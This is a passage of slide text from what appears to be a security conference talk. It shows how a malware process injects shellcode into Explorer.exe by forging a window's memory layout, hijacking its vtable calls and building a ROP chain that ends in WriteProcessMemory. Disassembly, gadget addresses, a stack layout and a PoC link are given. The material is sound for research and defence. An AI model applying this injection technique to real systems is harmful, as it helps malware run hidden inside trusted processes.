[email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

Slide 148

Slide 148 text

[email protected] /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); We Have Three Chances!

Slide 149

Slide 149 text

[email protected] ... Process Process Explorer.exe Window A +0 lParam (vtable) +4 hWnd ... Window Class Window A +0 lParam (vtable) +4 hWnd ... Malware.exe ...

Slide 150

Slide 150 text

[email protected] ... Process ... Process Explorer.exe Window A Window A Window B Window B Window C Window C Malware.exe ... ...

Slide 151

Slide 151 text

[email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +0 lParam (vtable) +4 hWnd ... Window A Fake Memory Layout Malware.exe Window A +0 lParam (vtable) +4 hWnd ...

Slide 152

Slide 152 text

[email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ... Window A Fake Memory Layout Malware.exe Window A +4 hWnd ... +8, +16, +24 ... Shellcode +0 lParam (vtable) +0 lParam (vtable)

Slide 153

Slide 153 text

[email protected] We have three arbitrary Eip points, but... Memory of Window Struct is mapped Read and Written Only (RW), No Executable.

Slide 154

Slide 154 text

[email protected] ROP! Return-oriented programming

Slide 155

Slide 155 text

[email protected] 「啊,好像棋盤似的。」 「我看倒有點像稿紙。」我說。 「真像⼀一塊塊綠⾖豆糕。」 ⼀一位外號叫「⼤大食客」的同學緊接著說。 雅量量

Slide 156

Slide 156 text

[email protected] 35, 31, c0, 90, c3 0: 35 31 c0 90 c3 xor eax, 0xc390c031 0: 31 c0 xor eax,eax 2: 90 nop 3: c3 ret 2: 90 nop 3: c3 ret

Slide 157

Slide 157 text

[email protected] –aaaddress1 ROP 是⼀一件 非常有雅量量的事情

Slide 158

Slide 158 text

[email protected] somewhere: ret Process Explorer.exe Stack 0xdead 0xbeef 0xcafe 0xdead: xor eax,eax ret 0xbeef: inc al ret 0xcafe: push eax ret

Slide 159

Slide 159 text

[email protected] But We cannot control data on stack, How do we make ROP Chain work?

Slide 160

Slide 160 text

[email protected] #1 Chance: (void(*)())*wndSelf(wndSelf); .text:00412015 mov ebx, [ebp+hWnd] .text:00412018 push 0 ; nIndex .text:0041201A push ebx ; hWnd .text:0041201B call GetWindowLongW(x,x) .text:00412021 mov esi, eax .text:0041202B mov eax, [esi] .text:0041202D push esi .text:0041202E call dword ptr [eax] We can set it point to ntdll!KiUserApcDispatcher()

Slide 161

Slide 161 text

[email protected] .text:77F06F98 _KiUserApcDispatcher@16 proc near .text:77F06F98 lea eax, [esp+arg_2D8] .text:77F06F9F mov ecx, large fs:0 .text:77F06FA6 mov edx, _KiUserApcExceptionHandler .text:77F06FAB mov [eax], ecx .text:77F06FAD mov [eax+4], edx .text:77F06FB0 mov large fs:0, eax .text:77F06FB6 pop eax .text:77F06FB7 lea edi, [esp-4+Context] .text:77F06FBB call eax .text:77F06FBD mov ecx, [edi+2CCh] .text:77F06FC3 mov large fs:0, ecx .text:77F06FCA push 1 ; TestAlert .text:77F06FCC push edi ; Context .text:77F06FCD call _ZwContinue@8 .text:77F06FD2 mov esi, eax

Slide 162

Slide 162 text

[email protected] #2 Chance: (*wndSelf+0x08)(x, x, x, x, x); .text:00412030 push [ebp+arg_C] .text:00412033 mov eax, [esi] .text:00412035 push [ebp+wParam] .text:00412038 mov ecx, esi .text:0041203A push edi .text:0041203B push ebx .text:0041203C call dword ptr [eax+8] We can set it to point to a Gadget

Slide 163

Slide 163 text

[email protected] #2 Chance: (*wndSelf+0x08)(x, x, x, x, x); SHELL32:75C82511 std SHELL32:75C82512 ret Set Direction flag(DF) = 1, Now MOVS instruction will decrease ESI/EDI on every operation.

Slide 164

Slide 164 text

[email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); .text:0041204E mov eax, [esi] .text:00412050 push esi .text:00412051 call dword ptr [eax+4]

Slide 165

Slide 165 text

[email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep movsd SHELL32:75C8091C pop edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 Copy 0x94 * sizeof(DWORD) bytes from ESI (Window Memory) to EDI(Stack Memory)

Slide 166

Slide 166 text

[email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep movsd SHELL32:75C8091C pop edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 Copy 0x94 * sizeof(DWORD) bytes from ESI (Window Memory) to EDI(Stack Memory) Stack Controllable! Control Return Address, #4 Chance!

Slide 167

Slide 167 text

[email protected] SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep movsd SHELL32:75C8091C pop edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 kernel32!7568E0E0 cld kernel32!7568E0E1 retn ntdll!7730289D: pop eax retn #4 Chance ntdll!alloca_probe: push ecx lea ecx, [esp+4] sub ecx, eax ... retn Use out of stack memory, Allocate local memory via alloca_probe()

Slide 168

Slide 168 text

[email protected] #4 Chance ntdll!_chkstk(alloca_probe): push ecx lea ecx, [esp+4] sub ecx, eax ... retn kernel32!WriteProcessMemory: mov edi, edi push ebp mov ebp, esp pop ebp ... retn ntdll!atan: ... Shellcode ... Stack: xxxx24 772BE4A6 (return) xxxx28 FFFFFFFF (current process) xxxx2C 772D48C0 (ntdll!atan) xxxx30 007F1408 (shellcode ) xxxx34 00000070 (byte count) xxxx38 00000000 (null)

Slide 169

Slide 169 text

Slide 170

Slide 170 text

[email protected] Facebook: 馬聖豪 Twitter: @aaaddress1 Email: [email protected] PoC: github.com/aaaddress1/winInject101 Thanks!